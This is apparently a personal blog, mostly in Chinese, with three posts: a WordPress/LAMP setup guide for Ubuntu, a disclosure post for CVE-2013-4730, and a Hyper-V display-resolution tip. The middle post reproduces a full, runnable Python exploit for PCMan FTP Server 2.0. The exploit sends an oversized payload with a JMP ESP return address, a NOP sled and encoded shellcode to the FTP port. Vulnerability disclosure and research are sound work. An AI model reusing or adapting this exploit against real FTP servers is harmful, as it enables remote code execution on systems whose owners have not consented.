Install WordPress with LAMP on Ubuntu

這幾天想說要重新架設Blog,在上面紀錄和整理自己的作品還有讀書研究時的筆記和遇到的問題。
給自己很多理由比如寫這個很無聊….哈..就一直拖延,但昨天失心瘋突然就下定決心回家一定要馬上處理這件事情。
晚上十點多回到家就開了一個新的Linode Server開始架設 🙂
之前我的Blog都偏黑色系,但現在我反而喜歡亮一點可愛一點? XD和簡單一點的樣式。

選擇Wordpress有幾個原因,除了才疏學淺沒有用過太多CMS外,最主要的原因是:

 Wordpress是主流的Blog和網站建置CMS之一有很多資料可以查和theme可以用,使用起來不複雜 

Step 1 安裝Apache

sudo apt-get install apache2
sudo a2enmod rewrite

在做個簡單的設定

sudo nano /etc/apache2/apache2.conf
然後加入這段
"
<Directory /var/www/html/> 
    Options Indexes FollowSymLinks
    AllowOverride All
    Require all granted
</Directory>

"
修改index.php順位
sudo nano /etc/apache2/mods-enabled/dir.conf

把index.php移到前面
<IfModule mod_dir.c> 
    DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm 
</IfModule>

Step 2 安裝MySQL Sever

sudo apt-get install mysql-server
sudo mysql_secure_installation 

Step 3 設定Databse給Wordpress用

先登入MySQL
mysql -u root -p

建立一個新的資料庫給Wordpress
CREATE DATABASE wordpress;

可以新建一個mysql user
CREATE USER 'user' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON wordpress.* TO 'user';
FLUSH PRIVILEGES;
EXIT;

Step 4 安裝PHP

sudo apt-get install php libapache2-mod-php php-mcrypt php-mysql php-cli

Step 5 下載並解壓縮Wordpress

下載並解壓縮Wordpress到網頁目錄
wget -c http://wordpress.org/latest.tar.gz
tar -xzvf latest.tar.gz

設定權限
sudo chown -R www-data:www-data /var/www/html/
sudo chmod -R 755 /var/www/html/

Step 6 設定wp-config.php

先在Blog目錄下把wp-config-sample.php改名為wp-config.php
sudo mv wp-config-sample.php wp-config.php

然後設定wp-config.php把相關的資料庫資料輸入即可
sudo nano wp-config.php

Step 7 重新啟動Apache 和MySQL

sudo service apache2 restart
sudo service mysql restart

之後用網頁瀏覽器瀏覽網站,再完成Wordpress的相關設定就好了

🙂

然後就是現在你們所看到的這個網站了 XD

[CVE-2013-4730] PCMan FTP Server 2.0.7 – Buffer Overflow

這是很久之前發現的漏洞,結果後來很多人都陸續寫了相關的exploit (= =)

EDB-ID: 26495 : https://www.exploit-db.com/exploits/26495/



#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
 
import socket
import sys
 
USER    = "anonymous"
PASSWD  = "TEST"
 
PAYLOAD = "\x41" * 2010
EIP     = "\xDB\xFC\x1C\x75"  # 751CFCDB   JMP ESP USER32.DLL
NOP     = "\x90" * 10
 
SHELLCODE =(
   "\xba\x38\xdc\x15\x77\xdd\xc7\xd9\x74\x24\xf4\x5d\x33\xc9"
   "\xb1\x33\x83\xc5\x04\x31\x55\x0e\x03\x6d\xd2\xf7\x82\x71"
   "\x02\x7e\x6c\x89\xd3\xe1\xe4\x6c\xe2\x33\x92\xe5\x57\x84"
   "\xd0\xab\x5b\x6f\xb4\x5f\xef\x1d\x11\x50\x58\xab\x47\x5f"
   "\x59\x1d\x48\x33\x99\x3f\x34\x49\xce\x9f\x05\x82\x03\xe1"
   "\x42\xfe\xec\xb3\x1b\x75\x5e\x24\x2f\xcb\x63\x45\xff\x40"
   "\xdb\x3d\x7a\x96\xa8\xf7\x85\xc6\x01\x83\xce\xfe\x2a\xcb"
   "\xee\xff\xff\x0f\xd2\xb6\x74\xfb\xa0\x49\x5d\x35\x48\x78"
   "\xa1\x9a\x77\xb5\x2c\xe2\xb0\x71\xcf\x91\xca\x82\x72\xa2"
   "\x08\xf9\xa8\x27\x8d\x59\x3a\x9f\x75\x58\xef\x46\xfd\x56"
   "\x44\x0c\x59\x7a\x5b\xc1\xd1\x86\xd0\xe4\x35\x0f\xa2\xc2"
   "\x91\x54\x70\x6a\x83\x30\xd7\x93\xd3\x9c\x88\x31\x9f\x0e"
   "\xdc\x40\xc2\x44\x23\xc0\x78\x21\x23\xda\x82\x01\x4c\xeb"
   "\x09\xce\x0b\xf4\xdb\xab\xe4\xbe\x46\x9d\x6c\x67\x13\x9c"
   "\xf0\x98\xc9\xe2\x0c\x1b\xf8\x9a\xea\x03\x89\x9f\xb7\x83"
   "\x61\xed\xa8\x61\x86\x42\xc8\xa3\xe5\x05\x5a\x2f\xc4\xa0"
   "\xda\xca\x18");
 
print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
data = s.recv(1024)
 
 
print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
 
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)
 
 
 
print("[-] Sending exploit...\n")
s.send(PAYLOAD + EIP + NOP +SHELLCODE +'\r\n')
s.close()
 
print("[!] Done! Exploit successfully sent\n")

Full Screen Ubuntu/Fedora in Hyper-V

——————Fedora / CentOS————————-

grubby --update-kernel=ALL --args="video= hyperv_fb:1920x1080"

——————Ubuntu / Kali————————-


 sudo nano /etc/dafault/grub

change
 GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
 to...
 GRUB_CMDLINE_LINUX_DEFAULT="quiet splash video=hyperv_fb:1920x1080" (in my case my screen resolution is 1920x1080)

sudo reboot

————-after reboot ——

sudo update-grub
sudo reboot

——————————————